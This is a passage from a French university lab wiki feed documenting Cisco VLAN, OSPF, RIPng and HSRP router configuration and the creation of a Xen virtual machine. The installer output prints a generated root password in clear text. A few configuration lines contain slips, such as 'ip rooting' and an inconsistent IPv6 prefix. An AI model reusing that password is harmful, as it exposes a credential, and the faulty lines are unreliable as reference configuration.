    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 2 à 7&lt;br /&gt;
    name groupe 1 à 6&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    conf t&lt;br /&gt;
    vlan 130&lt;br /&gt;
    name interconnexion&lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
Pour supprimer un vlan il suffit de faire :&lt;br /&gt;
    no vlan X&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E304 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyACM0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
 &lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   ip routing&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.254   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.6 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   ipv6 unicast-routing&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
  enable                                                  &lt;br /&gt;
 &lt;br /&gt;
  configure terminal&lt;br /&gt;
 &lt;br /&gt;
  interface XXXX                         &lt;br /&gt;
  no ip address                            //Pas d'addresse IP associé&lt;br /&gt;
  negotiation auto                         //Détermine automatiquement la vitesse de transfert&lt;br /&gt;
  media-type RJ45                          //Type de connexion (ici RJ45)&lt;br /&gt;
&lt;br /&gt;
Voici les vlan associé à nos groupes :&lt;br /&gt;
 &lt;br /&gt;
  service instance 2 ethernet              // création d'un vlan 2 dans cette interface&lt;br /&gt;
  encapsulation dot1q 2                    // Permets d'assurer une continuité d'un VLAN issue d'un switch sur un routeur via un lien trunk&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric      // retire le tag du vlan &lt;br /&gt;
  bridge-domain 2                          //création d'un bridge domaine interface (BDI) attribué au chiffre 2&lt;br /&gt;
    &lt;br /&gt;
  service instance 3 ethernet&lt;br /&gt;
  encapsulation dot1q 3&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 3&lt;br /&gt;
    &lt;br /&gt;
  service instance 4 ethernet&lt;br /&gt;
  encapsulation dot1q 4&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 4&lt;br /&gt;
  &lt;br /&gt;
  service instance 5 ethernet&lt;br /&gt;
  encapsulation dot1q 5&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 5&lt;br /&gt;
    &lt;br /&gt;
  service instance 6 ethernet&lt;br /&gt;
  encapsulation dot1q 6&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 6&lt;br /&gt;
  &lt;br /&gt;
  service instance 7 ethernet&lt;br /&gt;
  encapsulation dot1q 7&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 7&lt;br /&gt;
&lt;br /&gt;
Voici le vlan associé à l'interconnexion :&lt;br /&gt;
 &lt;br /&gt;
  service instance 42 ethernet&lt;br /&gt;
  encapsulation dot1q 42&lt;br /&gt;
  rewrite ingress tag pop 1 symmetric&lt;br /&gt;
  bridge-domain 42&lt;br /&gt;
&lt;br /&gt;
======  Vers le SR 32 ======&lt;br /&gt;
  interface XXXX                        &lt;br /&gt;
  no ip address&lt;br /&gt;
  negotiation auto&lt;br /&gt;
  service instance 130 ethernet&lt;br /&gt;
  encapsulation dot1q 130&lt;br /&gt;
  bridge-domain 130&lt;br /&gt;
   &lt;br /&gt;
&lt;br /&gt;
===== Configuration des BDI =====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface BDI1&lt;br /&gt;
   ip address 10.60.0.254 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI2&lt;br /&gt;
   ip address 10.60.1.254 255.255.255.000           //Attribut l'addresse IPV4 pour le routeur ainsi que son mask&lt;br /&gt;
   standby version 2                                //Activation du HSRP (Host service Routing protocole) version 2 plus stable que la 1&lt;br /&gt;
   standby 2 ip 10.60.1.252                       //Donne l'addresse  IPV4 du routeur virtuelle pour le HSRP                             &lt;br /&gt;
   standby 2 preempt                              // Activation du HSRP         &lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64      //Attribut l'addresse IPV6                             &lt;br /&gt;
   ipv6 enable                                      //Active l'addressage IPV6                              &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900  //Donner un préfixe IPV6 à chaque machine                              &lt;br /&gt;
   ipv6 nd router-preference high                    //IPV6 sera la route de préférence par défaut avec une forte probabilitée&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI3&lt;br /&gt;
   ip address 10.60.2.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252                                                     &lt;br /&gt;
   standby 3 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                       &lt;br /&gt;
   &lt;br /&gt;
   interface BDI4&lt;br /&gt;
   ip address 10.60.3.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252                                                     &lt;br /&gt;
   standby 4 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI5&lt;br /&gt;
   ip address 10.60.4.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252                                                    &lt;br /&gt;
   standby 5 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64                                   &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                   &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface BDI6&lt;br /&gt;
   ip address 10.60.5.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252                                                      &lt;br /&gt;
   standby 6 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit  &lt;br /&gt;
   &lt;br /&gt;
   interface BDI7&lt;br /&gt;
   ip address 10.60.6.254 255.255.255.000           &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252                                                      &lt;br /&gt;
   standby 7 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B7::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B7::/64 1000 900                                &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit                                 &lt;br /&gt;
 &lt;br /&gt;
   interface BDI42&lt;br /&gt;
   ip address 193.48.57.173 255.255.255.240         &lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172                                                     &lt;br /&gt;
   standby 42 preempt                                       &lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64                                    &lt;br /&gt;
   ipv6 enable                                                                    &lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900                               &lt;br /&gt;
   ipv6 nd router-preference High                    &lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   int vlan 130&lt;br /&gt;
   ip address 192.168.222.1 255.255.255.248         &lt;br /&gt;
   ipv6 address fe80::2 link-local                  &lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 rip tpima2a5 enable                        &lt;br /&gt;
   exit&lt;br /&gt;
   ip rooting&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
=== Configuration du router E306 ===&lt;br /&gt;
&lt;br /&gt;
===== Connexion =====&lt;br /&gt;
&lt;br /&gt;
Pour accéder au routeur, nous avons utilisé minicom avec un USB directement branché sur la prise console du commutateur :&lt;br /&gt;
&lt;br /&gt;
    minicom -os ( avec '''ttyUSB0''', une vitesse de transfert de '''9600 bauds''' et le ''''flow control désactivé''')     // les paramètres sont modifiable directement depuis les options de minicom&lt;br /&gt;
&lt;br /&gt;
===== Commande de base =====&lt;br /&gt;
&lt;br /&gt;
Ce sont exactement les mêmes que celles utilisées pour les commutateurs&lt;br /&gt;
&lt;br /&gt;
==== Configuration des ports ====&lt;br /&gt;
&lt;br /&gt;
La configuration est la même pour les 2 ports correspondant aux commutateurs&lt;br /&gt;
Nous avons besoin de 6 Vlan pour nos groupes et d'un Vlan d'interconnexion&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour SR32 =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal&lt;br /&gt;
    interface XXXX&lt;br /&gt;
    switchport&lt;br /&gt;
    switchport mode access //Rendre modifiable le port&lt;br /&gt;
    switchport access vlan130 //Autoriser le vlan 130 à transister à travers ce port&lt;br /&gt;
    no shutdown&lt;br /&gt;
    exit&lt;br /&gt;
    exit &lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
===== Création du lien pour les commutateurs =====&lt;br /&gt;
&lt;br /&gt;
    enable&lt;br /&gt;
    configure terminal (ou conf t)&lt;br /&gt;
    interface XXXX (ou int XXXX)&lt;br /&gt;
    switchport    &lt;br /&gt;
    switchport trunk encapsulation dot1q   &lt;br /&gt;
    switchport mode trunk  &lt;br /&gt;
    no shut    &lt;br /&gt;
    exit&lt;br /&gt;
    exit&lt;br /&gt;
    write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV4 ====&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   configure terminal&lt;br /&gt;
   router ospf 1        //création d'un opsf (Open Shortest Path First)                                      &lt;br /&gt;
   router-id 10.60.0.253   &lt;br /&gt;
   log-adjacency-changes&lt;br /&gt;
   summary-address 193.48.57.160 255.255.255.240 //donne l'addresse IP la plus base du réseau routé&lt;br /&gt;
   summary-address 10.60.0.1 255.255.0.0 not-advertise //donne l'addresse Ip la plus base du réseau non routé/ privé&lt;br /&gt;
   redistribute connected subnets&lt;br /&gt;
   network 192.168.222.8 0.0.0.7 area 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
==== Interconnexion du réseau IPV6 ====&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
   ipv6 router rip tpima2a5                 //Création d'une route IPV6 sous le nom tpima2a5&lt;br /&gt;
   redistribute connected metric 1&lt;br /&gt;
   redistribute rip 1 metric 1&lt;br /&gt;
   redistribute static metric 1&lt;br /&gt;
   exit&lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;br /&gt;
&lt;br /&gt;
======  Vers les commutateurs ======&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
   conf t&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan1&lt;br /&gt;
   ip address 10.60.0.253 255.255.255.0&lt;br /&gt;
   exit&lt;br /&gt;
    &lt;br /&gt;
   interface Vlan2&lt;br /&gt;
   ip address 10.60.1.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B2::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B2::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 2 ip 10.60.1.252&lt;br /&gt;
   standby 2 preempt&lt;br /&gt;
   exit&lt;br /&gt;
     &lt;br /&gt;
   interface Vlan3&lt;br /&gt;
   ip address 10.60.2.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B3::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B3::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 3 ip 10.60.2.252&lt;br /&gt;
   standby 3 preempt&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   interface Vlan4&lt;br /&gt;
   ip address 10.60.3.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B4::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B4::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 4 ip 10.60.3.252&lt;br /&gt;
   standby 4 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan5&lt;br /&gt;
   ip address 10.60.4.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B5::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B5::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 5 ip 10.60.4.252&lt;br /&gt;
   standby 5 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan6&lt;br /&gt;
   ip address 10.60.5.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B6::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B6::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 6 ip 10.60.5.252&lt;br /&gt;
   standby 6 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan7&lt;br /&gt;
   ip address 10.60.6.253 255.255.255.0&lt;br /&gt;
   ipv6 address 2201:660:4401:60B7::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2201:660:4401:60B7::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 7 ip 10.60.6.252&lt;br /&gt;
   standby 7 preempt&lt;br /&gt;
   exit   &lt;br /&gt;
   &lt;br /&gt;
   interface Vlan42&lt;br /&gt;
   ip address 193.48.57.174 255.255.255.0&lt;br /&gt;
   ipv6 address 2001:660:4401:60B1::/64 eui-64&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   ipv6 nd prefix 2001:660:4401:60B1::/64 1000 900&lt;br /&gt;
   ipv6 nd router-preference High&lt;br /&gt;
   standby version 2&lt;br /&gt;
   standby 42 ip 193.48.57.172&lt;br /&gt;
   standby 42 preempt&lt;br /&gt;
   exit&lt;br /&gt;
          &lt;br /&gt;
   interface Vlan130&lt;br /&gt;
   ip address 192.168.222.2 255.255.255.248&lt;br /&gt;
   ipv6 address FE80::42:3 link-local&lt;br /&gt;
   ipv6 enable&lt;br /&gt;
   exit&lt;br /&gt;
   &lt;br /&gt;
   exit&lt;br /&gt;
   write&lt;/div&gt;</summary>
		<author><name>Pcoint</name></author>	</entry>

	<entry>
		<id>https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51468</id>
		<title>TP sysres IMA2a5 2019/2020 G3</title>
		<link rel="alternate" type="text/html" href="https://wiki-ima.plil.fr/mediawiki//index.php?title=TP_sysres_IMA2a5_2019/2020_G3&amp;diff=51468"/>
				<updated>2019-11-29T14:51:13Z</updated>
		
		<summary type="html">&lt;p&gt;Pcoint : /* Informations importantes */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[Fichier:Rex4ever.PNG|500px|right|frameless|© Copyright Ginette]]&lt;br /&gt;
== Accueil/Descriptif du groupe ==&lt;br /&gt;
Bienvenue sur la page du groupe 3. Le découpage en groupe par numéro permet de se repérer plus facilement dans l'adressage des différents réseaux nécessaire.Ce groupe est constitué de :&lt;br /&gt;
&lt;br /&gt;
*Pascal Coint&lt;br /&gt;
*Quentin Weisbecker&lt;br /&gt;
&lt;br /&gt;
Ce TP consiste en la réalisation d’une maquette de réseau permettant de manipuler les protocoles de redondance réseau ainsi que le protocole réseau IPv6. D’un point de vue système nous avons à installer une machine virtuelle Xen avec l'OS Devian ainsi qu'implanter un auto-commutateur et un point d'accès. Nous effectuerons pas la suite des tests d'intrusion sur ces points d'accès afin de voir la vulnérabilité des différents protocoles de clé. Pour notre cas, nous nous étendrons sur les protocoles [https://fr.wikipedia.org/wiki/Wired_Equivalent_Privacy WEP] et [https://fr.wikipedia.org/wiki/Wi-Fi_Protected_Access WPA]-PSK.&lt;br /&gt;
&lt;br /&gt;
== Informations importantes == &lt;br /&gt;
&lt;br /&gt;
{| class=&amp;quot;wikitable&amp;quot; style=&amp;quot;text-align: center;width: 35%;margin: auto;&amp;quot;&lt;br /&gt;
! Description !! Détails&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|ID VLAN&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|4&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V4&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|10.60.3.0/24 &lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Réseau IP V6&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|2001:660:4401:60B3::/64&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Nom de l'ordinateur portable&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Requin&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Repérage à l'étiqueteuse&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|IMA2A5 - CW&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Numéro de poste&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|Zabeth03&lt;br /&gt;
|-&lt;br /&gt;
! scope=&amp;quot;row&amp;quot; style=&amp;quot;width: 40%&amp;quot;|Adresse du site internet&lt;br /&gt;
|style=&amp;quot;width: 60%&amp;quot;|https://www.ima2a5-rex4ever.site/ http://www.ima2a5-rex4ever.site/&lt;br /&gt;
|-&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
== La machine Virtuelle sous XEN : ima2a5-rex4ever ==&lt;br /&gt;
=== Note importante ===&lt;br /&gt;
Comme indiqué dans le sujet, nous allons créer une machine virtuelle via l'utilitaire [https://wiki.xenproject.org/wiki/Xen_Project_4.11_Man_Pages Xen] Linux sur le '''dom0 cordouan.insecserv.deule.net''' via la commande '''ssh''' et le compte administrateur usuel.Sur notre machine virtuelle nous créerons par la suite un compte pifou et un compte root identique au Zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Création de notre machine virtuelle XEN ===&lt;br /&gt;
Après s'être connecté, il faut maintenant creer la machine virtuelle :      &lt;br /&gt;
      xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
L'installation se lance alors :&lt;br /&gt;
&lt;br /&gt;
      root@cordouan:~# xen-create-image --hostname=ima2a5-rex4ever --dhcp --dir=/usr/local/xen --dist=ascii --apt_proxy=http://proxy.polytech-lille.fr:3128 --mirror=http://fr.deb.devuan.org/merged/ --force&lt;br /&gt;
      Use of uninitialized value within %DIST in pattern match (m//) at /usr/bin/xen-create-image line 1803.&lt;br /&gt;
      &lt;br /&gt;
      General Information&lt;br /&gt;
      --------------------&lt;br /&gt;
      Hostname       :  ima2a5-rex4ever&lt;br /&gt;
      Distribution   :  ascii&lt;br /&gt;
      Mirror         :  http://fr.deb.devuan.org/merged/&lt;br /&gt;
      Partitions     :  swap            512M  (swap)&lt;br /&gt;
                        /               4G    (ext4)&lt;br /&gt;
      Image type     :  sparse&lt;br /&gt;
      Memory size    :  256M&lt;br /&gt;
      Kernel path    :  /boot/vmlinuz-4.9.0-6-amd64&lt;br /&gt;
      Initrd path    :  /boot/initrd.img-4.9.0-6-amd64&lt;br /&gt;
      &lt;br /&gt;
      Networking Information&lt;br /&gt;
      ----------------------&lt;br /&gt;
      IP Address     : DHCP [MAC: xxxxxxx]&lt;br /&gt;
      &lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating swap on /usr/local/xen/domains/ima2a5-rex4ever/swap.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating partition image: /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      &lt;br /&gt;
      Creating ext4 filesystem on /usr/local/xen/domains/ima2a5-rex4ever/disk.img&lt;br /&gt;
      Done&lt;br /&gt;
      Installation method: debootstrap&lt;br /&gt;
&lt;br /&gt;
L'installation peut sembler bloquer sur cette dernière ligne mais il est possible de voir ce qui se passe en arrière plan via un second terminal en SSH et la commande SSH&lt;br /&gt;
      tail -f /var/xen-tools/ima2a5-rex4ever.log&lt;br /&gt;
&lt;br /&gt;
A la fin de l'installation,on obtient le mot de passe root et des informations importantes :&lt;br /&gt;
      Installation Summary&lt;br /&gt;
      ---------------------&lt;br /&gt;
      Hostname        :  ima2a5-rex4ever&lt;br /&gt;
      Distribution    :  ascii&lt;br /&gt;
      MAC Address     :  xxxxxxxxxxx&lt;br /&gt;
      IP Address(es)  :  dynamic&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (DSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ECDSA)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (ED25519)&lt;br /&gt;
      SSH Fingerprint :  SHA256:xxxxxxx (RSA)&lt;br /&gt;
      Root Password   :  sZzrYYPFZEwxsfmFghddGW5&lt;br /&gt;
&lt;br /&gt;
=== Ajout du bridge à ima2a5-rex4ever.cfg ===&lt;br /&gt;
Dans un premier lieu, on regarde l'existence du brige sur l'hote distant via : &lt;br /&gt;
      brctl show&lt;br /&gt;
Ce qui nous retourne : &lt;br /&gt;
      bridge name	bridge id		STP enabled	interfaces&lt;br /&gt;
      IMA2a5		8000.000af75e3dc0	no		eth1&lt;br /&gt;
      eth2&lt;br /&gt;
      if3.0&lt;br /&gt;
      IMA5sc		8000.000af75e3dc2	no		eth3&lt;br /&gt;
      eth5&lt;br /&gt;
      Insecure		8000.c81f66c22b83	no		vlan6&lt;br /&gt;
      L3MRIT		8000.000af763ae2d	no		eth4&lt;br /&gt;
      StudentsInfo		8000.c81f66c22b83	no		vlan50&lt;br /&gt;
On voit bien l'existence du bridge '''IMA2a5''', il faut donc l'ajouter à notre .cfg qui est le fichier de configuration de la VM ('''/etc/xen/ima2a5-rex4ever.cfg''')&lt;br /&gt;
et on modifie la ligne commençant par '''vif =''' et on ajoute le bridge de la manière suivante : &lt;br /&gt;
      vif = ['MAC:xxxxx,bridge = IMA2a5']&lt;br /&gt;
Après avoir modifié ce fichier, il faut le parser : xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
Une erreur '''NUMA placement failed, performance might be affected''' peut apparaître mais elle indique juste que xen n'arrive pas à disposer les VM comme il veut sur les procs, mais cela n'impactera que les performances nous passons outre ce problème.&lt;br /&gt;
&lt;br /&gt;
=== Démarrer la VM et accès console ===&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl create /etc/xen/ima2a5-rex4ever.cfg&lt;br /&gt;
On lance alors la commande pour accéder à la machine virtuelle: &lt;br /&gt;
      xl console ima2a5-rex4ever&lt;br /&gt;
&lt;br /&gt;
il demande alors le login (root) et le mdp (longue chaine précédemment générée). Après nous être logué,on change le mot de passe qui devient le même que le mot de passe du root de '''corduan''' ou d'une zabeth.&lt;br /&gt;
&lt;br /&gt;
=== Montage des répertoires /var et /home ===&lt;br /&gt;
==== Creation des disques logique ====&lt;br /&gt;
Il faut d'abord créer les partitions logiques sur corduan via : &lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-home virtual&lt;br /&gt;
     root@cordouan:~#lvcreate -L10G -n ima2a5-rex4ever-var virtual&lt;br /&gt;
Il est possible qu'il affiche l'avertissement suivant : '''WARNING: ext2 signature detected on /dev/virtual/ima2a5-rex4ever-home at offset 1080. Wipe it? [y/n]'''&lt;br /&gt;
repondre alors oui(y).&lt;br /&gt;
Il est possible de verifier que votre partition a bien été crée via la commande :&lt;br /&gt;
      lvdisplay&lt;br /&gt;
On obtient alors dans la liste de toutes les partitions, nous deux partitions précedemment créées&lt;br /&gt;
      --- Logical volume ---&lt;br /&gt;
      LV Path                '''/dev/virtual/ima2a5-rex4ever-home'''&lt;br /&gt;
      LV Name                ima2a5-rex4ever-home&lt;br /&gt;
      VG Name                virtual&lt;br /&gt;
      LV UUID                mhJqFx-zO1m-PlOU-Zmeu-8NGx-7UUO-c2g9dP&lt;br /&gt;
      LV Write Access        read/write&lt;br /&gt;
      LV Creation host, time cordouan, 2019-11-08 08:47:26 +0000&lt;br /&gt;
      LV Status              available&lt;br /&gt;
      # open                 0&lt;br /&gt;
      LV Size                10.00 GiB&lt;br /&gt;
      Current LE             2560&lt;br /&gt;
      Segments               1&lt;br /&gt;
      Allocation             inherit&lt;br /&gt;
      Read ahead sectors     auto&lt;br /&gt;
      - currently set to     256&lt;br /&gt;
      Block device           254:3&lt;br /&gt;
     --- Logical volume ---&lt;br /&gt;
     LV Path                '''/dev/virtual/ima2a5-rex4ever-var'''&lt;br /&gt;
     LV Name                ima2a5-rex4ever-var&lt;br /&gt;
     VG Name                virtual&lt;br /&gt;
     LV UUID                9Bnl6S-6CE5-CtO2-hD8f-RidD-sps5-b1mrWg&lt;br /&gt;
     LV Write Access        read/write&lt;br /&gt;
     LV Creation host, time cordouan, 2019-11-08 08:50:57 +0000&lt;br /&gt;
     LV Status              available&lt;br /&gt;
     # open                 0&lt;br /&gt;
     LV Size                10.00 GiB&lt;br /&gt;
     Current LE             2560&lt;br /&gt;
     Segments               1&lt;br /&gt;
     Allocation             inherit&lt;br /&gt;
     Read ahead sectors     auto&lt;br /&gt;
     - currently set to     256&lt;br /&gt;
     Block device           254:4&lt;br /&gt;
Il faut maintenant faire pointer le système de fichier sur nos deux nouveaux repertoires pour finir la création : &lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-home&lt;br /&gt;
     mke2fs /dev/virtual/ima2a5-rex4ever-var&lt;br /&gt;
